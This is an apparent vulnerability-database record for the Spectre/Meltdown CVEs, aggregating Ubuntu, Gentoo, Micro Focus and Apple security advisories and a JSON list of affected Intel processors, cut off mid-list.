Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel improperly performed sign extension in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16995)
Alexei Starovoitov discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel contained a branch-pruning logic issue around unreachable code. A local attacker could use this to cause a denial of service. (CVE-2017-17862)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel mishandled pointer data values in some situations. (CVE-2017-17864)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 17.10: linux-image-4.13.0-25-generic 4.13.0-25.29 linux-image-4.13.0-25-lowlatency 4.13.0-25.29 linux-image-generic 4.13.0.25.26 linux-image-lowlatency 4.13.0.25.26
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 6.5) - x86_64
-
7) - noarch, x86_64
-
Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201810-06
https://security.gentoo.org/
Severity: Normal Title: Xen: Multiple vulnerabilities Date: October 30, 2018 Bugs: #643350, #655188, #655544, #659442 ID: 201810-06
Synopsis
Multiple vulnerabilities have been found in Xen, the worst of which could cause a Denial of Service condition.
Background
Xen is a bare-metal hypervisor.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-emulation/xen < 4.10.1-r2 >= 4.10.1-r2 2 app-emulation/xen-tools < 4.10.1-r2 >= 4.10.1-r2 ------------------------------------------------------------------- 2 affected packages
Description
Multiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Xen users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.10.1-r2"
All Xen tools users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.10.1-r2"
References
[ 1 ] CVE-2017-5715 https://nvd.nist.gov/vuln/detail/CVE-2017-5715 [ 2 ] CVE-2017-5753 https://nvd.nist.gov/vuln/detail/CVE-2017-5753 [ 3 ] CVE-2017-5754 https://nvd.nist.gov/vuln/detail/CVE-2017-5754 [ 4 ] CVE-2018-10471 https://nvd.nist.gov/vuln/detail/CVE-2018-10471 [ 5 ] CVE-2018-10472 https://nvd.nist.gov/vuln/detail/CVE-2018-10472 [ 6 ] CVE-2018-10981 https://nvd.nist.gov/vuln/detail/CVE-2018-10981 [ 7 ] CVE-2018-10982 https://nvd.nist.gov/vuln/detail/CVE-2018-10982 [ 8 ] CVE-2018-12891 https://nvd.nist.gov/vuln/detail/CVE-2018-12891 [ 9 ] CVE-2018-12892 https://nvd.nist.gov/vuln/detail/CVE-2018-12892 [ 10 ] CVE-2018-12893 https://nvd.nist.gov/vuln/detail/CVE-2018-12893 [ 11 ] CVE-2018-15468 https://nvd.nist.gov/vuln/detail/CVE-2018-15468 [ 12 ] CVE-2018-15469 https://nvd.nist.gov/vuln/detail/CVE-2018-15469 [ 13 ] CVE-2018-15470 https://nvd.nist.gov/vuln/detail/CVE-2018-15470 [ 14 ] CVE-2018-3620 https://nvd.nist.gov/vuln/detail/CVE-2018-3620 [ 15 ] CVE-2018-3646 https://nvd.nist.gov/vuln/detail/CVE-2018-3646 [ 16 ] CVE-2018-5244 https://nvd.nist.gov/vuln/detail/CVE-2018-5244 [ 17 ] CVE-2018-7540 https://nvd.nist.gov/vuln/detail/CVE-2018-7540 [ 18 ] CVE-2018-7541 https://nvd.nist.gov/vuln/detail/CVE-2018-7541 [ 19 ] CVE-2018-7542 https://nvd.nist.gov/vuln/detail/CVE-2018-7542
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201810-06
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03158629
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: KM03158629 Version: 2
MFSBGN03802 - Virtualization Performance Viewer (vPV) / Cloud Optimizer, Local Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2018-05-11 Last Updated: 2018-05-10
Potential Security Impact: Local: Disclosure of Information
Source: Micro Focus, Product Security Response Team
VULNERABILITY SUMMARY A potential vulnerability has been identified in 3rd party component used by Micro Focus Virtualization Performance Viewer (vPV) / Cloud Optimizer Virtual Appliance. The vulnerability could be exploited to Local Disclosure of Information.
References:
- CVE-2017-5753
- CVE-2017-5715
- CVE-2017-5754
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP Virtualization Performance Viewer Software - v2.20, v3.0, v3.01, v3.02, v3.03
- HPE Cloud Optimizer - v2.20, v3.0, v3.01, v3.02, v3.03
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
RESOLUTION
Micro Focus is actively working with its vendors to address any systems-level Spectre and Meltdown impacts.However, if you have immediate concerns or questions regarding CentOS and its approach to Spectre or Meltdown, please contact them directly.
HISTORY
Version:1 (rev.1) - 12 April 2018 Initial release
Version:2 (rev.2) - 10 May 2018 Vulnerability Summary
Third Party Security Patches: Third party security patches that are to be installed on systems running Micro Focus products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal Micro Focus services support channel. For other issues about the content of this Security Bulletin, send e-mail to cyber-psrt@microfocus.com.
Report: To report a potential security vulnerability for any supported product: Web form: https://www.microfocus.com/support-and-services/report-security Email: security@microfocus.com
Subscribe: To initiate receiving subscriptions for future Micro Focus Security Bulletin alerts via Email, please subscribe here - https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification Once you are logged in to the portal, please choose security bulletins under product and document types. Please note that you will need to sign in using a Passport account. If you do not have a Passport account yet, you can create one- its free and easy https://cf.passport.softwaregrp.com/hppcf/createuser.do
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://softwaresupport.hpe.com/security-vulnerability
Software Product Category: The Software Product Category is represented in the title by the two characters following Micro Focus Security Bulletin.
3P = 3rd Party Software GN = Micro Focus General Software MU = Multi-Platform Software
System management and security procedures must be reviewed frequently to maintain system integrity. Micro Focus is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"Micro Focus is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected Micro Focus products the important security information contained in this Bulletin. Micro Focus recommends that all users determine the applicability of this information to their individual situations and take appropriate action. Micro Focus does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, Micro Focus will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, Micro Focus disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2017 EntIT Software LLC
Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither Micro Focus nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Micro Focus and the names of Micro Focus products referenced herein are trademarks of Micro Focus in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2018-1-23-2 macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan
macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan are now available and address the following:
Audio Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2018-4094: Mingi Cho, MinSik Shin, Seoyoung Kim, Yeongho Lee and Taekyoung Kwon of the Information Security Lab, Yonsei University
curl Available for: macOS High Sierra 10.13.2 Impact: Multiple issues in curl Description: An out-of-bounds read issue existed in the curl. This issue was addressed through improved bounds checking. CVE-2017-8817: found by OSS-Fuzz
IOHIDFamily Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)
Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A memory initialization issue was addressed through improved memory handling. CVE-2018-4090: Jann Horn of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A race condition was addressed through improved locking. CVE-2018-4092: an anonymous researcher
Kernel Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2018-4082: Russ Cox of Google
Kernel Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved validation. CVE-2018-4097: Resecurity, Inc.
Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4093: Jann Horn of Google Project Zero
LinkPresentation Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6.2 Impact: Processing a maliciously crafted text message may lead to application denial of service Description: A resource exhaustion issue was addressed through improved input validation. CVE-2018-4100: Abraham Masri (@cheesecakeufo)
QuartzCore Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of web content. This issue was addressed through improved input validation. CVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative
Sandbox Available for: macOS High Sierra 10.13.2 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed through additional sandbox restrictions. CVE-2018-4091: Alex Gaynor of Mozilla
Security Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: A certificate may have name constraints applied incorrectly Description: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed through improved trust evaluation of certificates. CVE-2018-4086: Ian Haken of Netflix
WebKit Available for: macOS High Sierra 10.13.2 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4088: Jeonghoon Shin of Theori CVE-2018-4089: Ivan Fratric of Google Project Zero CVE-2018-4096: found by OSS-Fuzz
Wi-Fi Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang University
Installation note:
macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlpnnmApHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEZaqg/8 DAjzEHmWMZxkSl88DnX/Y9x39DQ1eV6O0Bsg/WQ2r6wZlRDnBOYdJtgJU0I9MjgT JjOj6M/l+YkVS3EJHcdQqAZ6RfSSMvIcRieHJ0Lfj6bfohKRLJxuloFVKar3lAsY fIdzqlFKqWvPY6Neto2iR7ZhTWDW7QiVwbgSR1fleEWEglWtTeJjL6mff73Mqexh 7VngVFIicrbjoFD7uY2dctgkP+no3dcFieyRWF/z8OAmAOIkAc/KMqFyj22DBDq5 hH1j07Eo0RLKMT+nPq3Vgir5JVVR68M4UvDnSDXGHmTRYaM2BT8osWqlehgFQ52F JhqAsJsKP1Mc9WZkly8OvBbZHJcIJryTSqytOOZRQuvg6fXHPOezajcpThTntGiI /YcmaFIt8bZ8c0GbQXTMY8YCJEHtG3zb/z+Wf0sABfzbtCt48e5CQD5HDsoZyiML J84Sbs1Lb5XFYsdZg5iUFukIJRqYwaf69BUgMmFPTOxkBL/KH7m4BmUtLeiStLYN ykdW2TQFEbM6ojPL9HrAyho0wdX2/G4jiemAk22fb/XQ6q9+57RyduE/MDiFW93a 2XcIzxlsRk37ISIPyEkQTF/L/DTMdnhgI+ZIwmaMwU8Hd48MMMg6MIWYctefvnyB a1pVFFlwHCfxBWYSVI2fkKwExlNNYXCOjGsN7TSBfNc= =pc7O -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1711", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5287u" }, { "model": "xeon e5 2470 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3450" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5540" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2655le" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880l_v3" }, { "model": "xeon e3 1270 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4669_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e6510" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2435m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "875k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5503" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6148" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4980hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360" }, { "model": "xeon e5 1660 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3850" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5687" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2617m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5509" }, { "model": "xeon e3 1260l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "670" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4422e" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2718" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1585l_v5" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3230m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5518" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4005" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3317u" }, { "model": "xeon e3 1226 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1241 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699_v4" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1535m_v5" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4900mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3612qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3380m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330m" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867l" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v3" }, { "model": "xeon e-1105c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4012y" }, { "model": "xeon e5 1650", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670r" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7250" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4722hq" }, { "model": "xeon e3 1501m v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y30" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v4" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6154" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3220" }, { "model": "xeon e5 2448l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2312m" }, { "model": "xeon e3 1285l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4655_v4" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8180" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300t" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3405" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3350" }, { "model": "xeon e3 1230 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5638" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1750" }, { "model": "xeon e5 2403", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6350hq" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6146" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570r" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5550" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6140" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3350p" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5630" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6136" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "980" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4120u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w5580" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "820qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2640m" }, { "model": "xeon e3 1280 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3680" }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y30" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2850" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2338" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5122" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4160" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4657l_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4158u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6400t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4960hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5750hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640um" }, { "model": "xeon e3 1230 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v3" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v4" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l7555" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3667u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300y" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3160" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2367m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3740" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4130" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6102e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3687u" }, { "model": "xeon e3 1225 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100u" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5618" }, { "model": "xeon e5 2418l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2648l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3827" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4114t" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610" }, { "model": "xeon e5 2618l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2806" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2350m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6200u" }, { "model": "xeon e5 2440", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2603 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7210" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2890_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x6550" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8250u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2348m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4771" }, { "model": "xeon e3 1285 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130f" }, { "model": "xeon e5 2618l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2640 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2618l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1850" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6134" }, { "model": "xeon e3 1276 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3460" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1575m_v5" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v3" }, { "model": "xeon e3 1240 v3", "scope": "eq", "trust": 1.0, 